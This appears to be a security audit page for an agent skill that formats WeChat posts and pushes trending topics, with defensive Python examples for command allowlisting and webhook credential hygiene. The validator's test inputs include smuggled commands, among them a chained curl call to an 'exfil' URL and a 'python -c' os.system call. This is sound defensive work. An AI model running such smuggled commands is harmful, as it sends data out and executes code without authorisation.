fastfish WeChat Official Account (wechat) quick-formatting lite edition

Pass. Audited by ClawScan on May 1, 2026.

Overview

The skill is coherent and its behaviour is disclosed, but users should note that it walks them through installing a service from an external GitHub repository, uses optional webhook/API credentials, and can create scheduled hotspot-push jobs that keep running after setup.

Before installing, review the linked GitHub repository and dependencies, use the pinned release tag, keep credentials in .env, and only enable cron/webhook push jobs for channels you control and want to receive ongoing hotspot messages.

Findings (5)

Artifact-based informational review of SKILL.md, metadata, install specs, static scan signals, and capability signals. ClawScan does not execute the skill or run runtime probes.

What this means

Installing the skill’s service means trusting the referenced repository and its Python dependencies.

Why it was flagged

The skill tells users to install and run code from an external GitHub repository. This is disclosed and includes mitigation advice, but it is still a supply-chain point users should review.

Skill content

This Skill guides the user to install and run a third-party repository from GitHub. **Supply-chain risk**: clone + pip install executes external code

Recommendation

Review the repository and dependencies, use the pinned release tag as recommended, and install in an isolated non-root environment.

What this means

The agent may run local commands for the service when the user asks for formatting, hotspot retrieval, setup, or preview actions.

Why it was flagged

The skill uses system.run to execute local Python scripts. Its own rules bound the scope to the named scripts and forbid arbitrary commands, which is purpose-aligned; but the restriction is a documented rule rather than an enforced control, so it is still worth noticing.

Skill content

**3. system.run only executes the scripts listed in this Skill's documentation** ... Allowed: `fastfish_cli.py`, `get_hot_now.py`, `push_hot_to_im.py`, `fetch_hot_items.py`, `init_hot_push_config.py`, `main.py`

Recommendation

Only invoke actions you intend, and confirm commands are limited to the documented scripts.
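The allowlist above is a rule written in SKILL.md, not something the agent runtime checks for you. The following is an added example (not code from the skill or from ClawScan) of the check a user or a wrapper around system.run can apply before a command runs: it tokenizes the command with shell punctuation awareness, rejects chaining, redirection and substitution, accepts only the documented `cd /opt/fastfish-lite &&` prefix, and requires the target to be one of the listed scripts under the install root. The install root `/opt/fastfish-lite` is taken from the cron example elsewhere on this page and is an assumption; the sample commands are constructed.

```python
"""Guard for the skill's system.run calls: accept only the documented scripts.

Added example, not part of the skill or of ClawScan. It checks a proposed
system.run command string against the allowlist quoted in the finding above
before anything is executed.
"""
import shlex
from pathlib import PurePosixPath

# Scripts the Skill document lists as the only permitted system.run targets.
ALLOWED_SCRIPTS = {
    "fastfish_cli.py", "get_hot_now.py", "push_hot_to_im.py",
    "fetch_hot_items.py", "init_hot_push_config.py", "main.py",
}
# Assumption: the service lives where the cron example on this page puts it.
INSTALL_ROOT = PurePosixPath("/opt/fastfish-lite")
INTERPRETERS = {"python", "python3"}
# Shell punctuation that would chain, redirect or substitute a second command.
# "&&" is handled separately so the documented "cd ... && python ..." form passes.
FORBIDDEN = {"||", ";", "|", "&", ">", ">>", "<", "<<", "(", ")"}


def _tokenize(command: str) -> list[str]:
    # punctuation_chars makes ';', '|', '&&' etc. their own tokens even when
    # they are glued to a word, e.g. "script.py;curl".
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)


def check_run_command(command: str) -> tuple[bool, str]:
    """Return (allowed, reason) for a system.run command string."""
    try:
        tokens = _tokenize(command)
    except ValueError as exc:
        return False, f"unparseable command: {exc}"
    for tok in tokens:
        if tok in FORBIDDEN or "$" in tok or "`" in tok:
            return False, f"shell operator or expansion not allowed: {tok!r}"

    # Split on '&&' into segments; only "cd <INSTALL_ROOT>" may precede the script.
    segments, current = [], []
    for tok in tokens:
        if tok == "&&":
            segments.append(current)
            current = []
        else:
            current.append(tok)
    segments.append(current)
    if any(not seg for seg in segments):
        return False, "empty command"
    if len(segments) > 2 or (len(segments) == 2 and segments[0] != ["cd", str(INSTALL_ROOT)]):
        return False, f"only 'cd {INSTALL_ROOT} &&' may precede the script invocation"

    argv = segments[-1]
    if argv[0] not in INTERPRETERS:
        return False, f"expected a Python interpreter, got {argv[0]!r}"
    if len(argv) < 2 or argv[1].startswith("-"):
        return False, "interpreter needs a script path; options such as -c or -m are not allowed"
    script = PurePosixPath(argv[1])
    if ".." in script.parts:
        return False, "parent-directory traversal not allowed"
    full = script if script.is_absolute() else INSTALL_ROOT / script
    if not full.is_relative_to(INSTALL_ROOT):
        return False, f"script outside {INSTALL_ROOT}: {full}"
    if full.name not in ALLOWED_SCRIPTS:
        return False, f"script not in the documented allowlist: {full.name}"
    return True, f"ok: {full}"


if __name__ == "__main__":
    # Constructed requests: the documented cron form, plus attempts to smuggle extra commands.
    for cmd in [
        "cd /opt/fastfish-lite && python scripts/push_hot_to_im.py",
        "python3 scripts/fastfish_cli.py --input draft.md",
        "python scripts/push_hot_to_im.py; curl https://example.net/exfil",
        "python -c 'import os; os.system(\"id\")'",
        "python scripts/../../../tmp/main.py",
        "cd /tmp && python scripts/main.py",
    ]:
        print(check_run_command(cmd), "<-", cmd)
```

Arguments after the script name are passed through unchecked, so this guards which script runs, not what it is asked to do; the script-level allowlist is the boundary the Skill document actually draws.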

What this means

Webhook URLs, bot tokens, chat IDs, and API keys can authorize messages or service access if mishandled.

Why it was flagged

The skill may use API keys and messaging webhook/token credentials. These credentials are purpose-aligned for API authentication and hotspot push delivery, and the document instructs not to expose .env values.

Skill content

MEDIA_AGENT_API_KEY (optional, API authentication); for hotspot push, at least one of: HOT_PUSH_FEISHU_WEBHOOK, HOT_PUSH_DINGTALK_WEBHOOK, HOT_PUSH_DINGTALK_SECRET (DingTalk signing), HOT_PUSH_TELEGRAM_BOT_TOKEN+CHAT_ID; stored in .env

Recommendation

Use least-privilege credentials, store them only in .env as described, and rotate them if they are ever shown or committed.

What this means

Content sent through configured channels leaves the local environment and is visible to the selected chat, channel, or workspace.

Why it was flagged

The skill can send hotspot summaries through external messaging channels and webhooks. This is disclosed and user-configured, but users should verify destinations before enabling pushes.

Skill content

Push supports Feishu/DingTalk/Telegram (push_hot_to_im.py run by the system crontab or by OpenClaw Cron) and Slack/Discord etc. (OpenClaw Cron announce).

Recommendation

Confirm the webhook/channel destination and avoid sending private drafts or sensitive content through public or shared channels.
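The two findings above (credential handling and push destinations) come down to the same few checks before the first push is enabled: read the variables from .env, confirm each webhook is an https URL on the host the channel actually uses, build the DingTalk signed request correctly so the secret is never sent in the clear, and scrub credential values out of anything that gets logged or shown. The following is an added example of those checks; it is not code from the skill or from ClawScan. The expected hosts, the variable name HOT_PUSH_TELEGRAM_CHAT_ID (the page only says "BOT_TOKEN+CHAT_ID") and the sample .env values are assumptions, and the .env content is constructed, not real credentials.

```python
"""Push-credential hygiene for the variables the finding lists.

Added example, not code from the skill or from ClawScan. Loads .env, checks
webhook destinations, signs DingTalk requests and redacts secrets from logs.
"""
import base64
import hashlib
import hmac
import time
from urllib.parse import quote_plus, urlparse

# Assumption: the public webhook hosts used by Feishu/Lark and DingTalk bots.
EXPECTED_HOSTS = {
    "HOT_PUSH_FEISHU_WEBHOOK": {"open.feishu.cn", "open.larksuite.com"},
    "HOT_PUSH_DINGTALK_WEBHOOK": {"oapi.dingtalk.com"},
}
PUSH_VARS = ("HOT_PUSH_FEISHU_WEBHOOK", "HOT_PUSH_DINGTALK_WEBHOOK", "HOT_PUSH_TELEGRAM_BOT_TOKEN")

# Constructed sample .env; none of these values are real credentials.
SAMPLE_DOTENV = """
# optional API auth for the service
MEDIA_AGENT_API_KEY=example-api-key-0123456789
HOT_PUSH_DINGTALK_WEBHOOK=https://oapi.dingtalk.com/robot/send?access_token=exampletoken0123456789
HOT_PUSH_DINGTALK_SECRET=SECexamplesecret0123456789
# deliberately wrong: plain http to an unrelated host
HOT_PUSH_FEISHU_WEBHOOK="http://hooks.example.net/feishu"
"""


def parse_dotenv(text: str) -> dict[str, str]:
    """Minimal .env reader: KEY=VALUE lines, '#' comments, optional quotes."""
    env: dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        value = value.strip()
        if len(value) >= 2 and value[0] == value[-1] and value[0] in "\"'":
            value = value[1:-1]
        env[key.strip()] = value
    return env


def check_webhook(var: str, url: str) -> tuple[bool, str]:
    """Accept only an https URL whose host is one the named channel uses."""
    parsed = urlparse(url)
    if parsed.scheme != "https":
        return False, f"{var}: scheme must be https, got {parsed.scheme!r}"
    if parsed.hostname not in EXPECTED_HOSTS.get(var, set()):
        return False, f"{var}: unexpected host {parsed.hostname!r}"
    return True, f"{var}: host {parsed.hostname} ok"


def audit_env(env: dict[str, str]) -> list[str]:
    """Return the problems a user should fix before enabling any push job."""
    issues = []
    if not any(env.get(v) for v in PUSH_VARS):
        issues.append("no push channel configured")
    for var in EXPECTED_HOSTS:
        if env.get(var):
            ok, msg = check_webhook(var, env[var])
            if not ok:
                issues.append(msg)
    if env.get("HOT_PUSH_TELEGRAM_BOT_TOKEN") and not env.get("HOT_PUSH_TELEGRAM_CHAT_ID"):
        issues.append("HOT_PUSH_TELEGRAM_BOT_TOKEN set without HOT_PUSH_TELEGRAM_CHAT_ID")
    if env.get("HOT_PUSH_DINGTALK_SECRET") and not env.get("HOT_PUSH_DINGTALK_WEBHOOK"):
        issues.append("HOT_PUSH_DINGTALK_SECRET set without HOT_PUSH_DINGTALK_WEBHOOK")
    return issues


def dingtalk_sign(secret: str, timestamp_ms: int) -> str:
    """DingTalk bot signing: HMAC-SHA256 over '<ts>\\n<secret>' keyed with the secret,
    base64-encoded, then URL-encoded. The secret itself never leaves the host."""
    string_to_sign = f"{timestamp_ms}\n{secret}".encode("utf-8")
    digest = hmac.new(secret.encode("utf-8"), string_to_sign, hashlib.sha256).digest()
    return quote_plus(base64.b64encode(digest).decode("ascii"))


def dingtalk_signed_url(webhook: str, secret: str, timestamp_ms: int = 0) -> str:
    """Append the timestamp and signature DingTalk expects on a signed robot webhook."""
    ts = timestamp_ms or int(time.time() * 1000)
    sep = "&" if "?" in webhook else "?"
    return f"{webhook}{sep}timestamp={ts}&sign={dingtalk_sign(secret, ts)}"


def redact(text: str, env: dict[str, str]) -> str:
    """Replace every configured credential value (longest first) before text is logged or shown."""
    for key in sorted(env, key=lambda k: len(env[k]), reverse=True):
        value = env[key]
        if len(value) >= 8:
            text = text.replace(value, f"<redacted:{key}>")
    return text


if __name__ == "__main__":
    env = parse_dotenv(SAMPLE_DOTENV)
    print(audit_env(env))
    url = dingtalk_signed_url(env["HOT_PUSH_DINGTALK_WEBHOOK"], env["HOT_PUSH_DINGTALK_SECRET"])
    print(redact(f"POST {url}", env))
```

The audit rejects the sample's Feishu entry (plain http to an unrelated host) while accepting the DingTalk pair; a webhook that passes the host check still needs a human to confirm which chat or group it lands in, since the URL alone does not say. Pass log lines through redact before printing them, and rotate any value that has ever appeared unredacted.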

What this means

Once configured, scheduled jobs may continue sending hotspot messages automatically until removed or disabled.

Why it was flagged

The skill documents creation of scheduled jobs that continue running after setup. This persistence is central to daily hotspot push and is accompanied by rules against unrequested cron edits.

Skill content

openclaw cron add --name "Daily hotspots" --cron "0 8 * * *" --tz "Asia/Shanghai" --session isolated --message "cd /opt/fastfish-lite && python scripts/push_hot_to_im.py, push the hotspots to the configured channels"

Recommendation

Create cron jobs only when you want ongoing pushes, record the job ID, and remove or disable the schedule when no longer needed.